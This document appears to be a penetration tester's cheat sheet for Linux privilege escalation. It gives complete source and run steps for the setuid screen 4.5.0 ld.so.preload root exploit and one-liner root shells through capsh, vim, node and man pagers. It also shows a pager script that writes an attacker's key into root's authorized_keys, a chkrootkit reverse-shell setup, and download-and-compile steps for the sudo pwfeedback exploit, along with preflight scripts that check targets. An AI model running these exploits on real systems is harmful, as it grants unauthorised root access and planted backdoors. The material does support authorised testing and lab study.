These notes cover unusual SUID, sudo and capabilities cases. For any common binary, check GTFOBins first; the references below list more good sites for this :)
Build all of these files on your own machine first, then transfer them to the target.
Save this as libhax.c, then compile it with the command below. It is the library that /etc/ld.so.preload will point at: every setuid binary started afterwards loads it as root, and its constructor turns /tmp/rootshell into a setuid-root binary and removes the preload file again.
# Command to Compile
gcc -fPIC -shared -ldl -o libhax.so libhax.c
# Script To Save (libhax.c)
#include <stdio.h>
#include <sys/stat.h>    /* chmod */
#include <sys/types.h>
#include <unistd.h>      /* chown, unlink */
/* runs automatically when the library is loaded (via ld.so.preload, as root) */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);    /* make root the owner */
    chmod("/tmp/rootshell", 04755);   /* set the setuid bit */
    unlink("/etc/ld.so.preload");     /* clean up so nothing else preloads us */
    printf("[+] done!\n");
}
Save this as rootshell.c, then compile it with the command below. Once libhax.so has made the compiled binary setuid root, running it gives a root shell.
# Command to Compile
gcc -o rootshell rootshell.c
# Script To Save (rootshell.c)
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void){
    /* the binary is setuid root by now: make the real and effective ids root */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execvp takes (file, argv); the original passed a third argument, which
       current gcc rejects, so build a proper argv */
    char *const argv[] = { "/bin/sh", NULL };
    execvp("/bin/sh", argv);
    perror("execvp");   /* only reached if the exec failed */
    return 1;
}
Save the following as screenroot.sh. It is the setuid-screen log-file trick from infodox's script without its build steps (those are done on your own machine above), so it expects the library and shell to be at /tmp/libhax.so and /tmp/rootshell on the target:
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
# requires /tmp/libhax.so and /tmp/rootshell to be in place already
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
Transfer libhax.so, rootshell and screenroot.sh to the target, put libhax.so and rootshell in /tmp (the script hard-codes /tmp/libhax.so and /tmp/rootshell) and make them executable (the original notes use chmod 777). Then run the script and get rooted; if the script's own /tmp/rootshell call did not leave you in a shell, run the binary again by hand:
./screenroot.sh
./rootshell
Link => ExploitDB-41154
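Before running screenroot.sh it is worth confirming that the target actually matches what the technique needs: a setuid-root screen of the vulnerable release, no existing /etc/ld.so.preload (libhax.so unlinks it) and a writable /tmp. The preflight script below is an added example, not part of the original notes or of infodox's exploit. It assumes GNU stat (the -c option), that screen 4.5.0 reports itself as "Screen version 4.05.00" in screen -v, and the function names (screen_version_vulnerable, is_setuid_root, screen_preflight) and the file name screen_preflight.sh are my own.

```shell
#!/bin/bash
# screen_preflight.sh - added preflight check for the setuid screen 4.5.0
# ld.so.preload technique. Not part of the original exploit.
# Assumptions: GNU stat (-c), and that screen 4.5.0 prints
# "Screen version 4.05.00 (GNU) 10-Dec-16" for `screen -v`.

# Return 0 when the `screen -v` output is the vulnerable 4.5.0 release
screen_version_vulnerable() {
    case "$1" in
        "Screen version 4.05.00"*) return 0 ;;
        *)                         return 1 ;;
    esac
}

# Return 0 when a file mode (octal, as stat -c %a prints it) has the setuid
# bit set and the owner uid is 0, i.e. the binary runs as root
is_setuid_root() {
    mode="$1"; uid="$2"
    [ "$uid" = "0" ] || return 1
    [ $(( 0$mode & 04000 )) -ne 0 ]
}

# Run the real checks against this machine
screen_preflight() {
    bin=$(command -v screen) || { echo "[-] screen not installed"; return 1; }
    ver=$(screen -v 2>&1)
    screen_version_vulnerable "$ver" \
        || { echo "[-] '$ver' is not 4.05.00 (4.5.0), the release this exploit targets"; return 1; }
    is_setuid_root "$(stat -c %a "$bin")" "$(stat -c %u "$bin")" \
        || { echo "[-] $bin is not setuid root, so it cannot create /etc/ld.so.preload"; return 1; }
    if [ -e /etc/ld.so.preload ]; then
        echo "[-] /etc/ld.so.preload already exists; libhax.so unlinks it, so back it up first"
        return 1
    fi
    [ -w /tmp ] || { echo "[-] /tmp is not writable; the script expects /tmp/libhax.so and /tmp/rootshell"; return 1; }
    echo "[+] $bin is setuid root and reports: $ver"
    echo "[+] place libhax.so and rootshell in /tmp and run screenroot.sh"
}

# Only run when executed as a script, not when sourced for its functions
case "$0" in *screen_preflight.sh) screen_preflight ;; esac
```

Run it as ./screen_preflight.sh on the target (or source it and call screen_preflight). The two helper functions take their inputs as arguments so they can be checked against known values without a vulnerable box.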
- hping3 (SUID): just run the binary.
- At its prompt, type any command, for example id; everything runs as root, and you can move around the filesystem as root.
- /usr/sbin/capsh --keep=1 --user=root -- -c bash -p
- /usr/sbin/capsh -- -p
# vim.basic: only works when vim was built with Python support; try the py3 form first, then py
- vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
- vim.basic -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
[1] Case 1: man's default pager is not less, but less is installed: force it with -P or PAGER
- sudo /bin/man -P /usr/bin/less man
* Then, inside less: !/bin/sh
- sudo PAGER=/usr/bin/less /bin/man man
* Then, inside less: !/bin/sh
[2] Case 2: less is not on the box: hand man your own "pager", which it runs as root
- Create /tmp/cat
* Contents
#!/bin/sh
mkdir -p /root/.ssh
echo '<YOUR AUTHORIZED_KEYS>' > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
- chmod +x /tmp/cat
- sudo /bin/man -P /tmp/cat man
- Now log in with the matching private key: ssh -i id_rsa root@IP
- sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
Link => Local root exploit in Chkrootkit
- A vulnerable chkrootkit runs /tmp/update (as root) every time it is executed, so check cron to find out when chkrootkit is launched.
- Create a file named update in /tmp and make it executable (chmod +x /tmp/update).
- Put a reverse shell inside it, start your listener, and wait for the next chkrootkit run.
Link => CVE-2019-18634
- Sudo versions 1.7.1 to 1.8.30 inclusive are affected, but only if the pwfeedback option is enabled in sudoers (off upstream by default, on in some distributions such as Linux Mint and elementary OS). Exploiting it needs no sudo rights, just pwfeedback. Versions 1.8.26 to 1.8.30 carry the bug but are not exploitable because of the EOF handling change in 1.8.26, so the realistic targets are 1.8.25 and earlier.
- Test with this command (any user can run it):
-> perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S /bin/bash
-> If sudo dies with a segmentation fault, pwfeedback is on and the overflow is reachable; a non-vulnerable sudo just rejects the password.
- wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
- gcc exploit.c -o exploit
- Then run the exploit!
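The version ranges above are easy to get wrong from memory, so here is an added check script (not part of the original notes or of the saleemrashid exploit) that classifies the sudo -V output and then runs the advisory's crash test. It assumes the first line of sudo -V looks like "Sudo version 1.8.21p2" and encodes the ranges from the sudo advisory (1.7.1 to 1.8.30 affected, fixed in 1.8.31, 1.8.26 to 1.8.30 not exploitable); the function names and the file name sudo_pwfeedback_check.sh are my own.

```shell
#!/bin/bash
# sudo_pwfeedback_check.sh - added check for CVE-2019-18634. Not part of the
# original notes or of the saleemrashid exploit. Assumes the first line of
# `sudo -V` looks like "Sudo version 1.8.21p2" and uses the ranges from the
# sudo advisory: 1.7.1 .. 1.8.30 affected (fixed in 1.8.31), and 1.8.26 ..
# 1.8.30 not exploitable because of the EOF handling change in 1.8.26.

# Turn "1.8.25p1" into a comparable integer (major*1000000 + minor*1000 + patch)
sudo_version_key() {
    v="${1%%p*}"                      # drop the "pN" suffix
    set -- $(printf '%s' "$v" | tr '.' ' ')
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
}

# Classify a "Sudo version ..." line as not-affected, affected-not-exploitable
# or exploitable (exploitable still needs pwfeedback enabled in sudoers)
classify_sudo() {
    ver="${1#Sudo version }"
    ver="${ver%% *}"
    key=$(sudo_version_key "$ver")
    if [ "$key" -lt "$(sudo_version_key 1.7.1)" ] || [ "$key" -gt "$(sudo_version_key 1.8.30)" ]; then
        echo not-affected
    elif [ "$key" -ge "$(sudo_version_key 1.8.26)" ]; then
        echo affected-not-exploitable
    else
        echo exploitable
    fi
}

# Live check: version range first, then the advisory's crash test. pwfeedback
# lives in sudoers, which is normally unreadable, so a SIGSEGV is the practical
# signal that it is enabled and the overflow is reachable.
check_sudo_pwfeedback() {
    line=$(sudo -V 2>/dev/null | head -n 1)
    [ -n "$line" ] || { echo "[-] sudo not found"; return 2; }
    echo "[*] $line -> $(classify_sudo "$line")"
    # oversized "password" with embedded NUL bytes, fed on stdin with -S
    perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id >/dev/null 2>&1
    rc=$?
    if [ "$rc" -gt 128 ]; then              # 139 = 128 + SIGSEGV
        echo "[+] sudo crashed (rc=$rc): pwfeedback is on and the overflow is reachable"
        return 0
    fi
    echo "[-] no crash (rc=$rc): pwfeedback is off or this sudo is not vulnerable"
    return 1
}

# Only run when executed as a script, not when sourced for its functions
case "$0" in *sudo_pwfeedback_check.sh) check_sudo_pwfeedback ;; esac
```

A version that classifies as exploitable but does not crash is the common case (pwfeedback off); the reverse, a crash on a version the table calls not-affected, would mean the sudo -V line is not what this script expects, so check it by hand.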
[1] https://gtfobins.github.io/
[2] https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
[3] https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/